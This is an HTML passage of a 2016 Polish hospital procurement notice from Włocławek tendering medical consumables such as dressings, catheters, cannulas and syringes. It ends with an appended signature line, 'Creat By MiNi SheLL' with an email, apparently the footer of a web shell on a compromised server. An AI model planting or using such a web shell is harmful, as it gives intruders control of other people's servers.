<p>Oświadczenie o zapoznaniu się ze Specyfikacją Istotnych Warunków Zamówienia, zgodnie z Załącznikiem Nr 5 do SIWZ.
Zastrzeżenie informacji stanowiących tajemnicę przedsiębiorstwa - zgodnie      z Załącznikiem nr 3 do niniejszej Specyfikacji - jeżeli zachodzi taka potrzeba.
Oświadczenie, że oferowane produkty są dopuszczone do obrotu i stosowania, zgodnie  z ustawą o wyrobach medycznych z dnia 20 maja 2010 r. (t.j. Dz. U. z 2010 r. Nr 107, poz. 679) oraz aktami wykonawczymi do niej - zgodnie z Załącznikiem nr 7 do SIWZ.
W celu ustalenia zasad reprezentacji - pełnomocnictwo dla osoby, której prawo do reprezentacji nie wynika z dokumentów określonych w rozdziale 8. SIWZ, wydruk z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w przypadku składania oferty przez osobę prowadzącą jednoosobową działalność gospodarczą lub inny dokument potwierdzający uprawnienia do złożenia oferty w imieniu Wykonawcy(ów), w szczególności umowę spółki cywilnej w przypadku gdy ofertę składają wspólnicy takiej spółki; pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony.
Dokument pełnomocnictwa pełnomocnika występującego w imieniu podmiotów ubiegających się o wspólne wykonanie zamówienia w przypadku składania oferty wspólnej, pełnomocnictwo musi być złożone w formie oryginału lub poświadczonej notarialnie kopii, sporządzonego przez notariusza odpisu lub wyciągu z dokumentu, treść pełnomocnictwa musi jednoznacznie określać czynności do wykonania których pełnomocnik jest upoważniony</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza wprowadzenie zmian do umowy w następujących okolicznościach:
- zmiana terminu wykonania zamówienia, w przypadku zaistnienia okoliczności, których Strony umowy nie mogły przewidzieć w dniu jej zawarcia (np. okoliczności wynikające z działania siły wyższej);
- wydłużenie terminu wykonania zamówienia, w przypadku niewykorzystania ilościowego przedmiotu umowy, z  zastrzeżeniem zapisów zawartych w projekcie umowy;
- zmniejszenie wynagrodzenia, w przypadku obniżenia przez Wykonawcę ceny przedmiotu umowy;
- zmiany warunków płatności na bardziej korzystne dla Zamawiającego (np. terminu płatności, na system ratalny); 
- zamiana produktu (np. na towar innego producenta) przy zachowaniu tożsamości jego parametrów i właściwości, w przypadku niedostępności na rynku spowodowanej np. zaprzestaniem produkcji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mzoz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> W siedzibie Zamawiającego - Włocławek,  
ul. Jana Kilińskiego 16, Zamówienia Publiczne, pokój nr 46, lub pobrać ze strony internetowej Zamawiającego (www.bip.mzoz.pl).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.04.2016 godzina 14:00, miejsce: Miejski Zespół Opieki Zdrowotnej Sp. z o.o.
Sekretariat, II piętro, pokój nr 47
ul. Jana Kilińskiego 16, 87-800 Włocławek.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET 1 - Wyroby z włókniny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Prześcieradła jednorazowe gramatura 35g/m2, rozmiar: 210x80 cm - 2 000 Szt.
Prześcieradło na roli, włókninowe, o wysokiej wytrzymałości mechanicznej, 50x50 mb, rolka - 350 Szt.
Plaster włókninowy z opatrunkiem 6cm x1mb - 300 Szt.
Przylepiec włókninowy na roli 2,5cm x 9,14m, nawinięty na rolce bez ograniczników - 1 100 Szt.
Lignina w arkuszach, biała, niepyląca, min. 40 cm x 60 cm w kg - 200 Kg
Wata w zwoju 150 g wykonana z celuloz: siarczanowych liściastych krótkowłóknistych i siarczanowych iglastych długowłóknistych, biała, równomiernie marszczona, bez obcego zapachu, mało pyląca, pakowana w 
bezpieczny sposób. Na opakowaniu jednostkowym winna być umieszczona nazwa wyrobu oraz nazwa producenta - 250 Szt.
Kompresy gazowe niejałowe 17 nitkowe, 5x5 cm, opakowanie: 100 szt. - 700 Op.
Kompresy gazowe niejałowe 17 nitkowe, 7,5 x7,5 cm, opakowanie: 100 szt. - 700 Op.
Kompresy gazowe jałowe 17 nitkowe, 5x5 cm,  opakowanie: 3 szt. - 30 000 Op.
Kompresy gaz. jałowe 17 nitkowe, 7,5x7,5 cm, opakowanie: 3 szt. - 35 000 Op.
Opaska dziana  4x5cm - 300 Szt.
Opaska dziana 4x10 cm - 400 Szt.
Opaska elastyczna 4x12 cm - 70 Szt.
Gaza jałowa 1/2M, 17 nitkowa - 200 Op.
Podkłady higieniczne z wkładem chłonnym z pulpy celulozowej, zewnętrzna warstwa z antyposlizgowej, nieprzemakalnej folii (90 x 60 cm) - 1 200 Szt.
Opatrunek jałowy do wenflonów - 1 500 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET 2 - Sterylny sprzęt i odzież zabiegowa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maseczka jednorazowa, 3. warstwowa, na gumki - 100 Op.
Komplety zabiegowe do kriokomory (rękawice, skarpety, opaska, maseczka, szorty męskie/koszulki damskie, rozmiar: M), z naturalnego materiału: (bawełna, wełna) - 5 kompletów.
Komplety zabiegowe do kriokomory (rękawice, skarpety, opaska, maseczka, szorty męskie/koszulki damskie, rozmiar: L), z naturalnego materiału: (bawełna, wełna) - 5	kompletów.
Fartuch flizelinowy, jednorazowego użytku, z mankietem bawełnianym, niejałowy - 100 Szt.
Papier krepowany, miękki, 50/50 cm, opakowanie: 500 szt. - 5 Op.
Fartuch jednorazowy foliowy - 100 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET 3 - Strzykawki jednorazowego użytku.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Strzykawka jednorazowego użytku. trzyczęściowa, niskooporowa, wyposażona w czytelną skalę, typu Janette, do płukania i karmienia, o pojemności:  100-120 ml, z uszczelnieniem z elastycznego materiału (silikon, guma, guma syntetyczna lub inny równoważny), opakowanie: 100 szt. - 5	Op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET 4 - Kaniule i cewniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kaniula do wlewów dożylnych 0,7 x 19 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 200 Szt.	
Kaniula do wlewów dożylnych 0,9 x 25 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 600 Szt.	
Kaniula do wlewów dożylnych 1,1 x 33 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 600 Szt.	
Kaniula do wlewów dożylnych 1,3 x 45 mm, poliuretanowa, z 4 paskami radiocieniującymi, z membraną hydrofobową ułatwiającą odpowietrzanie kaniuli, z korkiem, którego część wchodząca do światła jest cofnięta 
poniżej krawędzi korka, z końcówką kolorową oznaczającą rozmiar, jednorazowa, sterylna, pakowana indywidualnie po 1 szt. - 300 Szt.	
Aparat do przetoczeń płynów infuzyjnych - 1 000 Szt.				
Cewnik urologiczny Foleya dwudrożny 14 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, 
długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 60 Szt.				
Cewnik urologiczny Foleya dwudrożny 16 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 60 Szt.		
Cewnik urologiczny Foleya dwudrożny 18 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt. - 100 Szt.		
Cewnik urologiczny Foleya dwudrożny 20 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 15 ml, z kolorowym oznaczeniem rozmiaru, długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt.	- 80 Szt.		
Cewnik urologiczny Foleya dwudrożny 22 CH, lateksowy, powlekany silikonem, z zaworem plastikowym lub lateksowym samozamykającym się, z balonem o pojemności 5 - 30 ml, z kolorowym oznaczeniem rozmiaru, 
długość 400 mm, jednorazowy, sterylny, pakowany indywidualnie, 1 szt.           - 80 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> PAKIET 5 - Drobny sprzęt ginekologiczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Utrwalacz cytologiczny, pojemność: 150-200 ml - 20 Op.
Żel do USG, pojemność opakowania: 0,5L - 400 Szt.
Osłonki lateksowe do głowic USG nawilżone, pojedynczo pakowane (opakowanie: 144 szt.) - 30 Op.
Pałeczki do pobierania wymazów sterylne, 20-22 cm, opakowanie: 25 szt. - 80 Op.
Szczoteczki cytologiczne trójkątne typu wachlarzyk jałowy - 5 000 Szt.
Wziernik ginekologiczny rozmiar: XS, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 24 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 1 000 Szt.
Wziernik ginekologiczny rozmiar: S, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 24 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 1 000 Szt.
Wziernik ginekologiczny rozmiar: M, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 26 mm, jednorazowy, sterylny, pakowany indywidualnie po1 szt. - 3 500 Szt.
Wziernik ginekologiczny rozmiar: L, wykonany z przezroczystego, medycznego plastiku, długość ryjka 30 mm, średnica czubka wziernika 26 mm, jednorazowy, sterylny, pakowany indywidualnie po 1 szt. - 400 Szt.
Szkiełka cytologiczne z polem do opisu, białe, opakowanie: 50 szt. - 90 Op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> PAKIET 6 - Drobny sprzęt medyczny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szpatułki drewniane jałowe, opakowanie: 100 szt. - 400 Op.				
Opaska identyfikacyjna dla dorosłych, opakowanie: 100 szt. - 1 Op.	
Worek na zwłoki plastikowy, zapinany na zamek błyskawiczny - 50 Szt.	
Staza automatyczna wielokrotnego użytku, posiadająca możliwość sterylizacji - 30 Szt.				
Nożyczki chirurgiczne Standard, końce tępo-ostre, proste, dł. 16,5 cm (+/- 0,5 cm) - 20 Szt.				
Rurki karbowane plastikowe do inhalatorów, o długości od 80 cm do 120 cm - 30 Szt.				
Ustniki jednorazowe plastikowe do inhalatora - 200 Szt.				
Maska do inhalatora dziecięca - 50 Szt.				
Maska do inhalatora dla dorosłych - 20 Szt.				
Worek do zbiórki moczu pojemność: 2 l, sterylny, dren 90cm, posiadający zawór ST - 250 Szt.				
Cewnik do odsysania górnych dróg oddechowych 18CH, długość 40-60 cm - 100 Szt.				
Cewnik do podawania tlenu przez nos, długość: co najmniej 2 m - 300 Szt.
Rurka intubacyjna z mankietem niskociśnieniowym, FI 7,5 - 20 Szt.	
Rurka intubacyjna z mankietem niskociśnieniowym, FI 6,5 - 20 Szt.	
Rurka ustno gardłowa Guedel 0 (czarna), sterylna - 15 Szt.				
Rurka ustno gardłowa Guedel 2 (zielona), sterylna - 20 Szt.				
Rurka ustno gardłowa Guedel 3 (żółta), sterylna - 20 Szt.				
Zgłębnik żołądkowy CH16x1000 - 50 Szt.				
Zgłębnik żołądkowy CH18x1000 - 50 Szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com